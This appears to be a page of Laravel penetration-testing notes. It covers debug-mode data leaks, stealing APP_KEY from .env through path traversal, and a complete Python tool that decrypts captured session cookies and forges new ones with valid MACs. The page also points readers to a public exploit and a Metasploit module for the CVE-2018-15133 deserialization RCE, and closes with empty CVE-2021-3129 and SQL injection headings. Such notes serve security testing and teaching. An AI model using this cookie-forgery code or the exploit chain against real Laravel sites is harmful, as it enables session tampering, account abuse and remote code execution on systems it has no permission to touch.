Laravel

Laravel Tricks

Debugging mode

If Laravel is in debugging mode (`APP_DEBUG=true` in `.env`), every unhandled exception renders a detailed error page that includes source code, stack traces and environment/config values, so sensitive data leaks on any error. For example, requesting http://127.0.0.1:8000/profiles:
Debug mode is also a precondition for several Laravel RCE CVEs (for example CVE-2021-3129, the Ignition debug-page RCE, only works with `APP_DEBUG=true`), so confirming it early is worthwhile.

.env

Laravel stores the `APP_KEY` it uses to encrypt cookies and sessions, together with other credentials (database, mail, third-party tokens), in a `.env` file in the project root, one level above `public/`. It can be read through a path-traversal bug or a misconfigured web root that serves the project root instead of `public/` (e.g. `/../.env`). In `.env` the key is written as `base64:<key>`; strip the `base64:` prefix before decoding it.
Laravel also displays these values in the debug error page (rendered whenever an exception occurs while debug mode is enabled).
With the secret APP_KEY you can verify, decrypt and re-encrypt (forge) cookies. A Laravel encrypted value is `base64(JSON{iv, value, mac})`: AES-CBC (AES-256 for a 32-byte key, AES-128 for a 16-byte one) with PKCS#7 padding, and an HMAC-SHA256 computed over the base64 `iv` and `value` strings. Check the MAC before decrypting, and re-MAC anything you modify, otherwise the server silently rejects the cookie:
import os
import json
import hashlib
import sys
import hmac
import base64
import string
import requests
from Crypto.Cipher import AES
from phpserialize import loads, dumps
#https://gist.github.com/bluetechy/5580fab27510906711a2775f3c4f5ce3
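def mcrypt_decrypt(value, iv, aes_key=None):
    """Raw AES-CBC decrypt of ``value`` (ciphertext bytes) under ``iv``.

    Returns the still-padded plaintext: PKCS#7 padding is NOT removed here,
    that is the caller's job (see ``decrypt``). ``iv`` must be 16 bytes.
    ``aes_key`` defaults to the module-level ``key`` (the decoded APP_KEY).

    The AES variant (128/256-bit) follows from the key length, so no global
    key-size override is needed. The original ``AES.key_size = 128`` line
    rebinds a module attribute of the crypto library; on pycryptodome that
    can make ``AES.new`` raise, and on legacy PyCrypto it was a no-op.
    """
    k = key if aes_key is None else aes_key
    cipher = AES.new(key=k, mode=AES.MODE_CBC, IV=iv)
    return cipher.decrypt(value)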
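def mcrypt_encrypt(value, iv, aes_key=None):
    """Raw AES-CBC encrypt of ``value`` under ``iv``.

    ``value`` must already be padded to a multiple of 16 bytes (``encrypt``
    applies PKCS#7 padding before calling this); ``iv`` must be 16 bytes.
    ``aes_key`` defaults to the module-level ``key`` (the decoded APP_KEY).

    The AES variant (128/256-bit) is chosen by the key length, so the
    original ``AES.key_size = 128`` override is dropped: it rebinds a module
    attribute of the crypto library and on pycryptodome can make
    ``AES.new`` raise.
    """
    k = key if aes_key is None else aes_key
    cipher = AES.new(key=k, mode=AES.MODE_CBC, IV=iv)
    return cipher.encrypt(value)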
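def _pkcs7_unpad(data):
    """Strip PKCS#7 padding from ``data``.

    Returns ``data`` unchanged when the trailing bytes are not a valid
    padding block (1..16 copies of the pad length), so a caller never loses
    real plaintext bytes.
    """
    if not data:
        return data
    n = data[-1]
    if 1 <= n <= 16 and data.endswith(bytes([n]) * n):
        return data[:-n]
    return data


def decrypt(bstring, aes_key=None, unpad=True):
    """Verify the MAC and decrypt a Laravel-encrypted cookie/session value.

    ``bstring`` is the cookie value as sent by the server: base64 of a JSON
    object ``{"iv": ..., "value": ..., "mac": ...}``. Laravel's MAC is
    HMAC-SHA256 (keyed with the APP_KEY) over the *base64* ``iv`` and
    ``value`` strings, so it is verified before anything is decrypted.

    Returns the plaintext bytes with PKCS#7 padding removed (pass
    ``unpad=False`` to get the raw padded block, the behaviour of the
    original snippet). Returns ``''`` when the MAC does not verify, which
    in practice means a wrong APP_KEY or a tampered cookie.
    ``aes_key`` defaults to the module-level ``key``.

    Raises ValueError (or a subclass) when ``bstring`` is not valid
    base64/JSON.
    """
    k = key if aes_key is None else aes_key
    payload = json.loads(base64.b64decode(bstring).decode())
    iv_b64 = payload['iv'].encode('utf-8')
    value_b64 = payload['value'].encode('utf-8')
    mac = payload.get('mac')

    expected = hmac.new(k, iv_b64 + value_b64, hashlib.sha256).hexdigest()
    # Constant-time comparison: irrelevant offensively, but it is the idiom
    # this code will be copied from, so do it right.
    if not isinstance(mac, str) or not hmac.compare_digest(expected, mac):
        return ''

    iv = base64.b64decode(iv_b64)
    ciphertext = base64.b64decode(value_b64)
    plain = AES.new(key=k, mode=AES.MODE_CBC, IV=iv).decrypt(ciphertext)
    # With the "cookie" session driver the plaintext is JSON whose "data"
    # field holds a PHP-serialized array; phpserialize.loads() can parse
    # that field if you need structured access.
    return _pkcs7_unpad(plain) if unpad else plain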
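def _pkcs7_pad(data, block=16):
    """Apply PKCS#7 padding so ``len(result)`` is a multiple of ``block``.

    A full block of padding is appended when ``data`` is already aligned,
    which is what PKCS#7 (and OpenSSL on the Laravel side) requires.
    """
    n = block - len(data) % block
    return data + bytes([n]) * n


def encrypt(string, aes_key=None):
    """Build a Laravel-compatible encrypted value for ``string``.

    ``string`` is the plaintext as bytes (a ``str`` is UTF-8 encoded). The
    result is ``base64(JSON{iv, value, mac})`` in the layout Laravel's
    Encrypter emits: a fresh random 16-byte IV, AES-CBC over the PKCS#7
    padded plaintext, and an HMAC-SHA256 (keyed with the APP_KEY) over the
    base64 ``iv`` + ``value`` strings. Because the IV is random, two
    encryptions of the same plaintext differ. ``aes_key`` defaults to the
    module-level ``key`` (the decoded APP_KEY).

    Returns the base64 blob as bytes, ready to be placed in the cookie.
    """
    k = key if aes_key is None else aes_key
    plain = string.encode('utf-8') if isinstance(string, str) else bytes(string)

    iv = os.urandom(16)
    ciphertext = AES.new(key=k, mode=AES.MODE_CBC, IV=iv).encrypt(_pkcs7_pad(plain))

    iv_b64 = base64.b64encode(iv)
    value_b64 = base64.b64encode(ciphertext)
    # Laravel MACs the base64 strings, not the raw bytes.
    mac = hmac.new(k, iv_b64 + value_b64, hashlib.sha256).hexdigest()

    payload = {'iv': iv_b64.decode(), 'value': value_b64.decode(), 'mac': mac}
    return base64.b64encode(bytes(json.dumps(payload), 'utf-8'))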
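# APP_KEY as found in .env. Laravel writes it as "base64:<key>"; the prefix is
# stripped here before decoding (this sample already has it stripped).
# 32 decoded bytes => AES-256-CBC, 16 bytes => AES-128-CBC.
app_key = 'HyfSfw6tOF92gKtVaLaLO4053ArgEf7Ze0ndz0v487k='
key = base64.b64decode(app_key.split('base64:', 1)[-1])

if __name__ == '__main__':
    # Session cookie captured from the target. With the "cookie" session
    # driver the PHP-serialized session array travels inside a JSON envelope
    # ({"data": "a:6:{...}", "expires": ...}) that is what decrypt() returns.
    captured = 'eyJpdiI6ImJ3TzlNRjV6bXFyVjJTdWZhK3JRZ1E9PSIsInZhbHVlIjoiQ3kxVDIwWkRFOE1sXC9iUUxjQ2IxSGx1V3MwS1BBXC9KUUVrTklReit0V2k3TkMxWXZJUE02cFZEeERLQU1PV1gxVForYkd1dWNhY3lpb2Nmb0J6YlNZR28rVmk1QUVJS3YwS3doTXVHSlhcL1JGY0t6YzhaaGNHR1duSktIdjF1elwvNXhrd1Q4SVlXMzBrbTV0MWk5MXFkSmQrMDJMK2F4cFRkV0xlQ0REVU1RTW5TNVMrNXRybW9rdFB4VitTcGQ0QlVlR3Vwam1IdERmaDRiMjBQS05VXC90SzhDMUVLbjdmdkUyMnQyUGtadDJHSEIyQm95SVQxQzdWXC9JNWZKXC9VZHI4Sll4Y3ErVjdLbXplTW4yK25pTGxMUEtpZVRIR090RlF0SHVkM0VaWU8yODhtaTRXcVErdUlhYzh4OXNacXJrVytqd1hjQ3FMaDhWeG5NMXFxVXB1b2V2QVFIeFwvakRsd1pUY0h6UUR6Q0UrcktDa3lFOENIeFR0bXIrbWxOM1FJaVpsTWZkSCtFcmd3aXVMZVRKYXl0RXN3cG5EMitnanJyV0xkU0E3SEUrbU0rUjlENU9YMFE0eTRhUzAyeEJwUTFsU1JvQ3d3UnIyaEJiOHA1Wmw1dz09IiwibWFjIjoiNmMzODEzZTk4MGRhZWVhMmFhMDI4MWQzMmRkNjgwNTVkMzUxMmY1NGVmZWUzOWU4ZTJhNjBiMGI5Mjg2NzVlNSJ9'
    # An empty result means the MAC did not verify: wrong APP_KEY or a
    # cookie from a different app.
    print(decrypt(captured))
    # Expected plaintext for the sample above (any trailing \x0e bytes are
    # PKCS#7 padding, not data):
    # b'{"data":"a:6:{s:6:\\"_token\\";s:40:\\"vYzY0IdalD2ZC7v9yopWlnnYnCB2NkCXPbzfQ3MV\\";s:8:\\"username\\";s:8:\\"guestc32\\";s:5:\\"order\\";s:2:\\"id\\";s:9:\\"direction\\";s:4:\\"desc\\";s:6:\\"_flash\\";a:2:{s:3:\\"old\\";a:0:{}s:3:\\"new\\";a:0:{}}s:9:\\"_previous\\";a:1:{s:3:\\"url\\";s:38:\\"http:\\/\\/206.189.25.23:31031\\/api\\/configs\\";}}","expires":1605140631}'

    # Forge a replacement: same structure, "order" swapped for an attacker
    # value. When editing PHP-serialized strings keep the s:<len> prefixes
    # consistent with the new string lengths or the server will discard it.
    forged = encrypt(b'{"data":"a:6:{s:6:\\"_token\\";s:40:\\"RYB6adMfWWTSNXaDfEw74ADcfMGIFC2SwepVOiUw\\";s:8:\\"username\\";s:8:\\"guest60e\\";s:5:\\"order\\";s:8:\\"lolololo\\";s:9:\\"direction\\";s:4:\\"desc\\";s:6:\\"_flash\\";a:2:{s:3:\\"old\\";a:0:{}s:3:\\"new\\";a:0:{}}s:9:\\"_previous\\";a:1:{s:3:\\"url\\";s:38:\\"http:\\/\\/206.189.25.23:31031\\/api\\/configs\\";}}","expires":1605141157}')
    print(forged.decode())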

Laravel Deserialization RCE

Vulnerable versions: 5.5.40 and 5.6.x through 5.6.29 (https://www.cvedetails.com/cve/CVE-2018-15133/). Exploitation requires the APP_KEY (leaked via `.env` or the debug page), because the forged cookie carrying the serialized gadget chain must have a valid HMAC. The 5.6.30 fix stops `unserialize`-ing cookie values by default, which closes this RCE but not cookie/session forgery with a known key.
You can find details of the deserialization vulnerability (cookie forgery, decryption and RCE) here: https://labs.f-secure.com/archive/laravel-cookie-forgery-decryption-and-rce/
You can test and exploit it with https://github.com/kozmic/laravel-poc-CVE-2018-15133, or with Metasploit: `use unix/http/laravel_token_unserialize_exec`. Both expect the target's APP_KEY as input.

CVE-2021-3129

Laravel SQLInjection
